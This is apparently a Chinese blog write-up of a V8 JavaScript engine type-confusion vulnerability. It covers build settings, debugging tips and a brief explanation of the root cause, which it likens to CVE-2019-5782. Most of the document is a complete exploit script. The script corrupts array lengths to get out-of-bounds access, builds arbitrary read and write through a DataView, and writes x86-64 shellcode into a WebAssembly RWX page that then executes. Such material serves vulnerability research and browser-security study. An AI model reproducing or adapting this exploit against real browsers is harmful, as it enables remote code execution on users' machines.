git reset --hard fc3ba8577e14342cc8edda808c517b6b9a088081
gclient sync
tools/dev/v8gen.py x64.release
编辑 out.gn/x64.release/args.gn
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
v8_enable_verify_heap = true
ninja -C out.gn/x64.release d8
调试技巧
运行加该参数可以调试js代码
-print-opt-code
运行加
--trace-turbo
会生成json文件,然后用Turbolizer打开
cd tools/turbolizer
npm i
npm run-script build
python -m SimpleHTTPServer
原理
和cve-2019-5782类似,编译器和实际的js层的结果不一致导致的类型混淆,在运行poc之后,实际返回的是NaN,但是编译器却认为是typer_->cache_->kInteger,这时候就导致了类型混淆进而造成数组越界。
exp
主要是改a2 length的时候注意不能只改一个length两个length(obj和数组的length)都改才可以,这样才不会报错,这里主要利用的方法是定义a1通过a1改a2本身的length然后通过a2改数组的length,这样就得到了length很大的一个数组,然后便可以构造addrof和read_dataview以及write_dataview来造成任意地址写,还需要注意的是由于是高版本的v8因此与原先的写wasm来弹计算器的方法略有不同
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
var uint32 = new Uint32Array(buf);
function f2i(f)
{
float64[0] = f;
return bigUint64[0];
}
function i2f(i)
{
bigUint64[0] = i;
return float64[0];
}
function i2f1(addr){
let tmp = [];
tmp[0] = parseInt(addr % 0x100000000);
tmp[1] = parseInt((addr - tmp[0]) / 0x100000000);
uint32.set(tmp)
return float64[0];
}
function hex(a) {
return "0x" + a.toString(16);
}
function f2half(val)
{
float64[0]= val;
let tmp = Array.from(uint32);
return tmp;
}
function half2f(val)
{
uint32.set(val);
return float64[0];
}
function wasm_func() {
var wasmImports = {
env: {
puts: function puts (index) {
print(utf8ToString(h, index));
}
}
};
var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,137,128,128,128,0,2,
96,1,127,1,127,96,0,0,2,140,128,128,128,0,1,3,101,110,118,4,112,117,
116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,
131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,
109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,1,10,141,128,128,
128,0,1,135,128,128,128,0,0,65,16,16,0,26,11,11,146,128,128,128,0,1,0,
65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let m = new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
let h = new Uint8Array(m.exports.memory.buffer);
return m.exports.hello;
}
func = wasm_func();
var wasmObjAddr;
var a1, a2,a3,a4,floatArray,obj,objArray,objBuf,objView,tmp_low,tmp_high;
function foo(idx,idx1) {
a1 = [, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1];
a2 = [, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9];
let x = -Infinity;
let i = 0;
for (; i < 1; i += x) {
if (i == -Infinity) x = +Infinity;
}
let value = Math.max(i, 1);
value = -value;
value = Math.max(value, -2);
value >>= 0;
value += 0x2;
idx &= 28;
idx1 &= 7;
idx = idx *value;
idx1 = idx1 * value;
idx<<=1;
idx>>=1;
idx1<<=1;
idx1>>=1;
let tmp = a1[idx];
let tmp1 = a2[idx1];
if(tmp == undefined && tmp1 == undefined){
tmp = 1.1;
tmp1 = 1.1;
}
else{
tmp += 1.73833895195875e-310;
tmp1 += 1.73833895195875e-310;
}
a1[idx] = tmp;
a2[idx1] = tmp1;
return a2;
//return tmp1;
}
//print(i2f1(0x200000000000));
for(let i = 0;i<10000;i++) foo(16,5);
a3 = a2;
objBuf = new ArrayBuffer(0x200);
objView = new DataView(objBuf);
a4 = new BigUint64Array(4);
a4[0] = 0x1122334455667788n;
a4[1] = 0xaabbaabbccddccddn;
a4[2] = 0xdeadbeefdeadbeefn;
a4[3] = 0xeeeeeeeeffffffffn;
obj = {aaaa:"bbbb"};
objArray = [obj];
objArray[0] = func;
function read_dataview(addr){
let tmp_low = addr << 32n;
let tmp_hign = addr >> 32n;
tmp_hign = 2n * 0x100000000n + tmp_hign;
a3[13] = i2f(tmp_low);
a3[14] = i2f(tmp_hign);
return f2i(objView.getFloat64(0,true));
}
function write_dataview(addr,payload){
let tmp_low = addr << 32n;
let tmp_hign = addr >> 32n;
tmp_hign = 2n * 0x100000000n + tmp_hign;
a3[13] = i2f(tmp_low);
a3[14] = i2f(tmp_hign);
for(var i = 0;i < payload.length;i++){
objView.setUint8(i,payload[i],true);
}
}
var addr_high = f2i(a3[40]) >> 32n;
addr_high = addr_high << 32n;
print(hex(addr_high));
var addr_low = f2i([a3[54]]) >> 32n;
wasmObjAddr = addr_high + addr_low;
print(hex(wasmObjAddr));
var sharedInfoAddr = read_dataview(wasmObjAddr+0x7n) - 1n >> 32n ;
sharedInfoAddr = sharedInfoAddr + addr_high;
console.log("share info addr: "+hex(sharedInfoAddr));
var wasmExportedFunctionDataAddr = read_dataview(sharedInfoAddr-0x1n) >> 32n;
wasmExportedFunctionDataAddr = wasmExportedFunctionDataAddr + addr_high;
console.log("wasm_func_data_addr: "+ hex(wasmExportedFunctionDataAddr));
var instanceAddr = read_dataview(wasmExportedFunctionDataAddr+0x3n) >> 32n ;
instanceAddr = instanceAddr + addr_high;
console.log("instanceAddr: "+ hex(instanceAddr));
var rwx_addr = read_dataview(instanceAddr + 0x67n);
console.log("rwx_addr: "+ hex(rwx_addr));
var shellcode = [72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 121, 98,
96, 109, 98, 1, 1, 72, 49, 4, 36, 72, 184, 47, 117, 115, 114, 47, 98,
105, 110, 80, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1,
72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90,
72, 1, 226, 82, 72, 137, 226, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72,
184, 121, 98, 96, 109, 98, 1, 1, 1, 72, 49, 4, 36, 49, 246, 86, 106, 8,
94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5];
write_dataview(rwx_addr, shellcode);
func();
网友评论